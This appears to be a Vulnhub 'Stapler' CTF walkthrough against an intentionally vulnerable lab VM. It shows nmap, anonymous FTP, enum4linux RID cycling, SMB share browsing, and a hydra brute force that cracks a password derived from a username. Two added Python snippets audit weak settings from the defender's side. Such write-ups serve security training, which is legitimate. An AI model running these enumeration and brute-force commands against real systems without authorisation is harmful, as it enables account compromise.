Vulnhub - Stapler Writeup


Description:

Vulnhub - Stapler. Average beginner/intermediate VM, only a few twists. May find it easy/hard (depends on YOUR background), also which way you attack the box. It SHOULD work on both VMware and Virtualbox. REBOOT the VM if you CHANGE network modes. Fusion users, you’ll need to retry when importing.

There are multiple methods to-do this machine

  • At least two (2) paths to get a limited shell
  • At least three (3) ways to get a root access

Enumeration

Start enumeration after adding stapler.com to the hosts file.

Nmap

# Nmap 7.80 scan initiated Sat Feb 29 00:37:43 2020 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /home/kali/Desktop/tools/autorecon/results/stapler.com/scans/_full_tcp_nmap.txt -oX /home/kali/Desktop/tools/autorecon/results/stapler.com/scans/xml/_full_tcp_nmap.xml stapler.com
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
adjust_timeouts2: packet supposedly had rtt of -456769 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -456769 microseconds.  Ignoring time.
Nmap scan report for stapler.com (192.168.15.3)
Host is up, received arp-response (0.00059s latency).
Scanned at 2020-02-29 00:37:45 EST for 167s
Not shown: 65523 filtered ports
Reason: 65523 no-responses
PORT      STATE  SERVICE     REASON         VERSION
20/tcp    closed ftp-data    reset ttl 64
21/tcp    open   ftp         syn-ack ttl 64 vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.15.4
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open   ssh         syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp    open   domain      syn-ack ttl 64 dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        syn-ack ttl 64 PHP cli server 5.5 or later
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: 404 Not Found
123/tcp   closed ntp         reset ttl 64
137/tcp   closed netbios-ns  reset ttl 64
138/tcp   closed netbios-dgm reset ttl 64
139/tcp   open   netbios-ssn syn-ack ttl 64 Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   doom?       syn-ack ttl 64
3306/tcp  open   mysql       syn-ack ttl 64 MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 1514
|   Capabilities flags: 63487
|   Some Capabilities: Support41Auth, FoundRows, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, ODBCClient, SupportsTransactions, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, IgnoreSigpipes, LongPassword, SupportsCompression, InteractiveClient, ConnectWithDatabase, LongColumnFlag, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: ~h8\x0E\x0B\x01x\x0B\x1EK\x0BL~!E\x14\x0Ffo?
|_  Auth Plugin Name: mysql_native_password
12380/tcp open   http        syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
MAC Address: 08:00:27:6B:13:CE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.055 days (since Fri Feb 28 23:21:51 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms stapler.com (192.168.15.3)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 29 00:40:32 2020 -- 1 IP address (1 host up) scanned in 170.95 seconds

That’s a lot of services. We might have quite a few rabbit holes.

FTP

kali@kali:~/Desktop/vulnhub/stapler$ ftp stapler.com
Connected to stapler.com.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220 
Name (stapler.com:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (264.5372 kB/s)
ftp> exit
221 Goodbye.
kali@kali:~/Desktop/vulnhub/stapler$ cat note 
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

FTP allows anonymous login. We are greeted with a banner, and the directory contains a note. The names in the banner and the note might be users on the system. Let’s create a user list and add harry, elly and john.

Enum4linux

kali@kali:~/Desktop/tools/autorecon/results/stapler.com/scans$ enum4linux stapler.com
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Mar  2 20:27:18 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... stapler.com
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =================================================== 
|    Enumerating Workgroup/Domain on stapler.com    |
 =================================================== 
[+] Got domain/workgroup name: WORKGROUP

 =========================================== 
|    Nbtstat Information for stapler.com    |
 =========================================== 
Looking up status of 192.168.15.3
        RED             <00> -         H <ACTIVE>  Workstation Service
        RED             <03> -         H <ACTIVE>  Messenger Service
        RED             <20> -         H <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> H <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> H <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         H <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> H <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ==================================== 
|    Session Check on stapler.com    |
 ==================================== 
[+] Server stapler.com allows sessions using username '', password ''

 ========================================== 
|    Getting domain SID for stapler.com    |
 ========================================== 
Unable to initialize messaging context
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ===================================== 
|    OS information on stapler.com    |
 ===================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for stapler.com from smbclient: 
[+] Got OS info for stapler.com from srvinfo:
Unable to initialize messaging context
        RED            Wk Sv PrQ Unx NT SNT red server (Samba, Ubuntu)
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ============================ 
|    Users on stapler.com    |
 ============================ 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ======================================== 
|    Share Enumeration on stapler.com    |
 ======================================== 
Unable to initialize messaging context

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        kathy           Disk      Fred, What are we doing here?
        tmp             Disk      All temporary files should be stored here
        IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on stapler.com
//stapler.com/print$    Mapping: DENIED, Listing: N/A
//stapler.com/kathy     Mapping: OK, Listing: OK
//stapler.com/tmp       Mapping: OK, Listing: OK
//stapler.com/IPC$      [E] Can't understand response:
Unable to initialize messaging context
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 =================================================== 
|    Password Policy Information for stapler.com    |
 =================================================== 


[+] Attaching to stapler.com using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] RED
        [+] Builtin

[+] Password Info for Domain: RED

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: Not Set
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: Not Set


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ============================= 
|    Groups on stapler.com    |
 ============================= 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ====================================================================== 
|    Users on stapler.com via RID cycling (RIDS: 500-550,1000-1050)    |
 ====================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-864226560-67800430-3082388513
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
----output snipped----
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
----output snipped----
[+] Enumerating users using SID S-1-5-21-864226560-67800430-3082388513 and logon username '', password ''
---output snipped-----
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

 ============================================ 
|    Getting printer info for stapler.com    |
 ============================================ 
Unable to initialize messaging context
No printers returned.


enum4linux complete on Mon Mar  2 20:28:07 2020

More users, found by RID cycling over the null session, and some accessible SMB shares. Add the users to our user list.
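The same output read from the defender's side, as an added example that is not part of the original writeup: a small parser that turns an enum4linux report into a list of audit findings. The sample lines are a constructed excerpt of the run above, and the 12-character baseline is an assumption, not a value from the page.

```python
import re

# Constructed excerpt: lines taken from the enum4linux run above, trimmed.
SAMPLE = r"""
[+] Server stapler.com allows sessions using username '', password ''
//stapler.com/print$    Mapping: DENIED, Listing: N/A
//stapler.com/kathy     Mapping: OK, Listing: OK
//stapler.com/tmp       Mapping: OK, Listing: OK
        [+] Minimum password length: 5
        [+] Account Lockout Threshold: None
Password Complexity: Disabled
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
"""

NULL_SESSION = re.compile(r"allows sessions using username '', password ''")
SHARE = re.compile(r"^//[^/\s]+/(\S+)\s+Mapping:\s*(\w+),\s*Listing:\s*(\S+)")
MIN_LENGTH = re.compile(r"Minimum password length:\s*(\d+)", re.IGNORECASE)
LOCKOUT = re.compile(r"Account Lockout Threshold:\s*(\S+)")
COMPLEXITY = re.compile(r"Password Complexity:\s*(\w+)")
UNIX_USER = re.compile(r"^S-1-22-1-\d+\s+Unix User\\(\S+)\s+\(Local User\)")


def parse_enum4linux(text):
    """Extract the security-relevant facts from an enum4linux text report."""
    report = {
        "null_session": False, "anon_shares": [], "unix_users": [],
        "min_length": None, "lockout_threshold": None, "complexity": None,
    }
    for raw in text.splitlines():
        line = raw.strip()
        if NULL_SESSION.search(line):
            report["null_session"] = True
            continue
        m = SHARE.match(line)
        if m:
            share, mapping, listing = m.groups()
            # Only shares that were both mapped and listed count as exposed.
            if mapping == "OK" and listing == "OK":
                report["anon_shares"].append(share)
            continue
        m = UNIX_USER.match(line)
        if m:
            report["unix_users"].append(m.group(1))
            continue
        m = MIN_LENGTH.search(line)
        if m:
            report["min_length"] = int(m.group(1))
        m = LOCKOUT.search(line)
        if m:
            report["lockout_threshold"] = m.group(1)
        m = COMPLEXITY.search(line)
        if m:
            report["complexity"] = m.group(1)
    return report


def findings(report, required_min_length=12):
    """Turn parsed facts into findings. required_min_length is an assumed baseline."""
    out = []
    if report["null_session"]:
        out.append("null-session: SMB session accepted with empty username and password")
    for share in report["anon_shares"]:
        out.append(f"anon-share: '{share}' can be mapped and listed without credentials")
    if report["unix_users"]:
        out.append(f"rid-cycling: {len(report['unix_users'])} local account names disclosed")
    if report["min_length"] is not None and report["min_length"] < required_min_length:
        out.append(f"policy: minimum password length {report['min_length']} "
                   f"is below {required_min_length}")
    if report["complexity"] == "Disabled":
        out.append("policy: password complexity disabled")
    if report["lockout_threshold"] == "None":
        out.append("policy: no account lockout threshold, guessing is not throttled")
    return out


if __name__ == "__main__":
    for item in findings(parse_enum4linux(SAMPLE)):
        print(item)
```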

Smbclient

kali@kali:~/Desktop/vulnhub/stapler$ smbclient \\\\stapler.com\\tmp
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Feb 29 06:09:13 2020
  ..                                  D        0  Mon Jun  6 17:39:56 2016
  ls                                  N      274  Sun Jun  5 11:32:58 2016

                19478204 blocks of size 1024. 16388900 blocks available
smb: \> exit
kali@kali:~/Desktop/vulnhub/stapler$ smbclient \\\\stapler.com\\kathy
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun  3 12:52:52 2016
  ..                                  D        0  Mon Jun  6 17:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 11:02:27 2016
  backup                              D        0  Sun Jun  5 11:04:14 2016

                19478204 blocks of size 1024. 16388900 blocks available
smb: \> cd backup
smb: \backup\> ls
  .                                   D        0  Sun Jun  5 11:04:14 2016
  ..                                  D        0  Fri Jun  3 12:52:52 2016
  vsftpd.conf                         N     5961  Sun Jun  5 11:03:45 2016
  wordpress-4.tar.gz                  N  6321767  Mon Apr 27 13:14:46 2015

                19478204 blocks of size 1024. 16388900 blocks available
smb: \backup\> cd ..
smb: \> ls
  .                                   D        0  Fri Jun  3 12:52:52 2016
  ..                                  D        0  Mon Jun  6 17:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 11:02:27 2016
  backup                              D        0  Sun Jun  5 11:04:14 2016

                19478204 blocks of size 1024. 16388900 blocks available
smb: \> cd kathy_stuff
smb: \kathy_stuff\> ls
  .                                   D        0  Sun Jun  5 11:02:27 2016
  ..                                  D        0  Fri Jun  3 12:52:52 2016
  todo-list.txt                       N       64  Sun Jun  5 11:02:27 2016

                19478204 blocks of size 1024. 16388900 blocks available
smb: \kathy_stuff\> get todo-list.txt 
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (8.9 KiloBytes/sec) (average 8.9 KiloBytes/sec)
smb: \kathy_stuff\> exit
kali@kali:~/Desktop/vulnhub/stapler$ cat todo-list.txt 
I'm making sure to backup anything important for Initech, Kathy

There seems to be a WordPress backup and an FTP config backup. There is nothing interesting in there. No usernames or passwords.

Low Shell - Method 1 (Bruteforcing)

Bruteforce

I tried out all other ports, but most of them seem to be rabbit holes. I usually use brute forcing as the last resort.
Let’s try brute forcing FTP and SSH using hydra. We will be using the user list we created.
Add the -e nsr option to also try a null password, the user name itself and the reversed user name for each login.
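The three guesses that -e nsr adds are cheap to rule out on the defending side. The following is an added example, not code from the original writeup: a password-change filter and an audit of stored hashes against exactly those candidates. The PBKDF2 record format is a stand-in for whatever hash scheme the system really uses, the alice and bob accounts are constructed, and the 12-character default is an assumption.

```python
import hashlib
import hmac
import os


def nsr_candidates(username):
    """Guesses `-e nsr` adds per login: n = null, s = same as login, r = reversed."""
    return ["", username, username[::-1]]


def username_derived(password, usernames):
    """Return the account name the password equals or reverses (case-insensitive)."""
    folded = password.casefold()
    for name in usernames:
        n = name.casefold()
        if folded in (n, n[::-1]):
            return name
    return None


def check_new_password(owner, password, all_users, min_length=12):
    """Password-change filter: list of reasons to reject, empty list means accept.

    min_length defaults to an assumed baseline, not a value from the page.
    """
    reasons = []
    if len(password) < min_length:
        reasons.append(f"shorter than {min_length} characters")
    source = username_derived(password, [owner, *all_users])
    if password and source is not None:
        reasons.append(f"derived from account name '{source}'")
    return reasons


def audit_accounts(stored, verify):
    """Check each stored hash against the three nsr candidates for its own login.

    stored: {username: hash_record}; verify(candidate, record) -> bool.
    Returns {username: "null" | "same" | "reverse"} for the accounts that match.
    """
    weak = {}
    for user, record in stored.items():
        for label, candidate in zip(("null", "same", "reverse"), nsr_candidates(user)):
            if verify(candidate, record):
                weak[user] = label
                break
    return weak


# Stand-in hash scheme so the audit runs offline (assumption: a real audit
# plugs in the verifier for the system's own password hashes).
def demo_hash(password, salt=None):
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10_000)


def demo_verify(candidate, record):
    salt, digest = record
    return hmac.compare_digest(demo_hash(candidate, salt)[1], digest)


def demo_store():
    """elly/ylle is the pair hydra reports on this page; alice and bob are constructed."""
    return {
        "elly": demo_hash("ylle"),
        "alice": demo_hash("alice"),
        "bob": demo_hash("a long constructed passphrase"),
    }


if __name__ == "__main__":
    print(audit_accounts(demo_store(), demo_verify))
    print(check_new_password("elly", "ylle", ["john", "harry"]))
```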

FTP

kali@kali:~/Desktop/vulnhub/stapler$ hydra -l elly -P /usr/share/wordlists/rockyou.txt ftp://stapler.com -V -e nsr
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-07 07:12:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344402 login tries (l:1/p:14344402), ~896526 tries per task
[DATA] attacking ftp://stapler.com:21/
[ATTEMPT] target stapler.com - login "elly" - pass "elly" - 1 of 14344402 [child 0] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "" - 2 of 14344402 [child 1] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "ylle" - 3 of 14344402 [child 2] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "123456" - 4 of 14344402 [child 3] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "12345" - 5 of 14344402 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "123456789" - 6 of 14344402 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "password" - 7 of 14344402 [child 6] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "iloveyou" - 8 of 14344402 [child 7] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "princess" - 9 of 14344402 [child 8] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "1234567" - 10 of 14344402 [child 9] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "rockyou" - 11 of 14344402 [child 10] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "12345678" - 12 of 14344402 [child 11] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "abc123" - 13 of 14344402 [child 12] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "nicole" - 14 of 14344402 [child 13] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "daniel" - 15 of 14344402 [child 14] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "babygirl" - 16 of 14344402 [child 15] (0/0)
[21][ftp] host: stapler.com   login: elly   password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-07 07:12:17

And bam! We have a username and password to log in. Didn’t even need to use a wordlist. Let’s log in and see what’s inside.

kali@kali:~/Desktop/vulnhub/stapler$ ftp stapler.com
Connected to stapler.com.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220 
Name (stapler.com:kali): elly
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    5 0        0            4096 Jun 03  2016 X11
drwxr-xr-x    3 0        0            4096 Jun 03  2016 acpi
-rw-r--r--    1 0        0            3028 Apr 20  2016 adduser.conf
-rw-r--r--    1 0        0              51 Jun 03  2016 aliases
-rw-r--r--    1 0        0           12288 Jun 03  2016 aliases.db
drwxr-xr-x    2 0        0            4096 Jun 07  2016 alternatives
drwxr-xr-x    8 0        0            4096 Jun 03  2016 apache2
drwxr-xr-x    3 0        0            4096 Jun 03  2016 apparmor
drwxr-xr-x    9 0        0            4096 Jun 06  2016 apparmor.d
drwxr-xr-x    3 0        0            4096 Jun 03  2016 apport
drwxr-xr-x    6 0        0            4096 Jun 03  2016 apt
-rw-r-----    1 0        1             144 Jan 14  2016 at.deny
drwxr-xr-x    5 0        0            4096 Jun 03  2016 authbind
-rw-r--r--    1 0        0            2188 Aug 31  2015 bash.bashrc
drwxr-xr-x    2 0        0            4096 Jun 03  2016 bash_completion.d
-rw-r--r--    1 0        0             367 Jan 27  2016 bindresvport.blacklist
drwxr-xr-x    2 0        0            4096 Apr 12  2016 binfmt.d
drwxr-xr-x    2 0        0            4096 Jun 03  2016 byobu
drwxr-xr-x    3 0        0            4096 Jun 03  2016 ca-certificates
-rw-r--r--    1 0        0            7788 Jun 03  2016 ca-certificates.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 console-setup
drwxr-xr-x    2 0        0            4096 Jun 03  2016 cron.d
drwxr-xr-x    2 0        0            4096 Jun 03  2016 cron.daily
drwxr-xr-x    2 0        0            4096 Jun 03  2016 cron.hourly
drwxr-xr-x    2 0        0            4096 Jun 03  2016 cron.monthly
drwxr-xr-x    2 0        0            4096 Jun 03  2016 cron.weekly
-rw-r--r--    1 0        0             722 Apr 05  2016 crontab
-rw-r--r--    1 0        0              54 Jun 03  2016 crypttab
drwxr-xr-x    2 0        0            4096 Jun 03  2016 dbconfig-common
drwxr-xr-x    4 0        0            4096 Jun 03  2016 dbus-1
-rw-r--r--    1 0        0            2969 Nov 10  2015 debconf.conf
-rw-r--r--    1 0        0              12 Apr 30  2015 debian_version
drwxr-xr-x    3 0        0            4096 Jun 05  2016 default
-rw-r--r--    1 0        0             604 Jul 02  2015 deluser.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 depmod.d
drwxr-xr-x    4 0        0            4096 Jun 03  2016 dhcp
-rw-r--r--    1 0        0           26716 Jul 30  2015 dnsmasq.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 dnsmasq.d
drwxr-xr-x    4 0        0            4096 Jun 07  2016 dpkg
-rw-r--r--    1 0        0              96 Apr 20  2016 environment
drwxr-xr-x    4 0        0            4096 Jun 03  2016 fonts
-rw-r--r--    1 0        0             594 Jun 03  2016 fstab
-rw-r--r--    1 0        0             132 Feb 10  2016 ftpusers
-rw-r--r--    1 0        0             280 Jun 20  2014 fuse.conf
-rw-r--r--    1 0        0            2584 Feb 18  2016 gai.conf
-rw-rw-r--    1 0        0            1253 Jun 04  2016 group
-rw-------    1 0        0            1240 Jun 03  2016 group-
drwxr-xr-x    2 0        0            4096 Jun 03  2016 grub.d
-rw-r-----    1 0        42           1004 Jun 04  2016 gshadow
-rw-------    1 0        0             995 Jun 03  2016 gshadow-
drwxr-xr-x    3 0        0            4096 Jun 03  2016 gss
-rw-r--r--    1 0        0              92 Oct 22  2015 host.conf
-rw-r--r--    1 0        0              12 Jun 03  2016 hostname
-rw-r--r--    1 0        0             469 Jun 05  2016 hosts
-rw-r--r--    1 0        0             411 Jun 03  2016 hosts.allow
-rw-r--r--    1 0        0             711 Jun 03  2016 hosts.deny
-rw-r--r--    1 0        0            1257 Jun 03  2016 inetd.conf
drwxr-xr-x    2 0        0            4096 Feb 06  2016 inetd.d
drwxr-xr-x    2 0        0            4096 Jun 06  2016 init
drwxr-xr-x    2 0        0            4096 Jun 06  2016 init.d
drwxr-xr-x    5 0        0            4096 Jun 03  2016 initramfs-tools
-rw-r--r--    1 0        0            1748 Feb 04  2016 inputrc
drwxr-xr-x    3 0        0            4096 Jun 03  2016 insserv
-rw-r--r--    1 0        0             771 Mar 06  2015 insserv.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 insserv.conf.d
drwxr-xr-x    2 0        0            4096 Jun 03  2016 iproute2
drwxr-xr-x    2 0        0            4096 Jun 03  2016 iptables
drwxr-xr-x    2 0        0            4096 Jun 03  2016 iscsi
-rw-r--r--    1 0        0             345 Mar 13 09:35 issue
-rw-r--r--    1 0        0             197 Jun 03  2016 issue.net
drwxr-xr-x    2 0        0            4096 Jun 03  2016 kbd
drwxr-xr-x    5 0        0            4096 Jun 03  2016 kernel
-rw-r--r--    1 0        0             144 Jun 03  2016 kernel-img.conf
-rw-r--r--    1 0        0           26754 Jun 07  2016 ld.so.cache
-rw-r--r--    1 0        0              34 Jan 27  2016 ld.so.conf
drwxr-xr-x    2 0        0            4096 Jun 07  2016 ld.so.conf.d
drwxr-xr-x    2 0        0            4096 Jun 03  2016 ldap
-rw-r--r--    1 0        0             267 Oct 22  2015 legal
-rw-r--r--    1 0        0             191 Jan 18  2016 libaudit.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 libnl-3
drwxr-xr-x    4 0        0            4096 Jun 06  2016 lighttpd
-rw-r--r--    1 0        0            2995 Apr 14  2016 locale.alias
-rw-r--r--    1 0        0            9149 Jun 03  2016 locale.gen
-rw-r--r--    1 0        0            3687 Jun 03  2016 localtime
drwxr-xr-x    6 0        0            4096 Jun 03  2016 logcheck
-rw-r--r--    1 0        0           10551 Mar 29  2016 login.defs
-rw-r--r--    1 0        0             703 May 06  2015 logrotate.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 logrotate.d
-rw-r--r--    1 0        0             103 Apr 12  2016 lsb-release
drwxr-xr-x    2 0        0            4096 Jun 03  2016 lvm
-r--r--r--    1 0        0              33 Jun 03  2016 machine-id
-rw-r--r--    1 0        0             111 Nov 20  2015 magic
-rw-r--r--    1 0        0             111 Nov 20  2015 magic.mime
-rw-r--r--    1 0        0            2579 Jun 03  2016 mailcap
-rw-r--r--    1 0        0             449 Oct 30  2015 mailcap.order
drwxr-xr-x    2 0        0            4096 Jun 03  2016 mdadm
-rw-r--r--    1 0        0           24241 Oct 30  2015 mime.types
-rw-r--r--    1 0        0             967 Oct 30  2015 mke2fs.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 modprobe.d
-rw-r--r--    1 0        0             195 Apr 20  2016 modules
drwxr-xr-x    2 0        0            4096 Jun 03  2016 modules-load.d
lrwxrwxrwx    1 0        0              19 Jun 03  2016 mtab -> ../proc/self/mounts
drwxr-xr-x    4 0        0            4096 Jun 06  2016 mysql
drwxr-xr-x    7 0        0            4096 Jun 03  2016 network
-rw-r--r--    1 0        0              91 Oct 22  2015 networks
drwxr-xr-x    2 0        0            4096 Jun 03  2016 newt
-rw-r--r--    1 0        0             497 May 04  2014 nsswitch.conf
drwxr-xr-x    2 0        0            4096 Apr 20  2016 opt
lrwxrwxrwx    1 0        0              21 Jun 03  2016 os-release -> ../usr/lib/os-release
-rw-r--r--    1 0        0            6595 Jun 23  2015 overlayroot.conf
-rw-r--r--    1 0        0             552 Mar 16  2016 pam.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 pam.d
-rw-r--r--    1 0        0            2908 Jun 04  2016 passwd
-rw-------    1 0        0            2869 Jun 03  2016 passwd-
drwxr-xr-x    4 0        0            4096 Jun 03  2016 perl
drwxr-xr-x    3 0        0            4096 Jun 03  2016 php
drwxr-xr-x    3 0        0            4096 Jun 06  2016 phpmyadmin
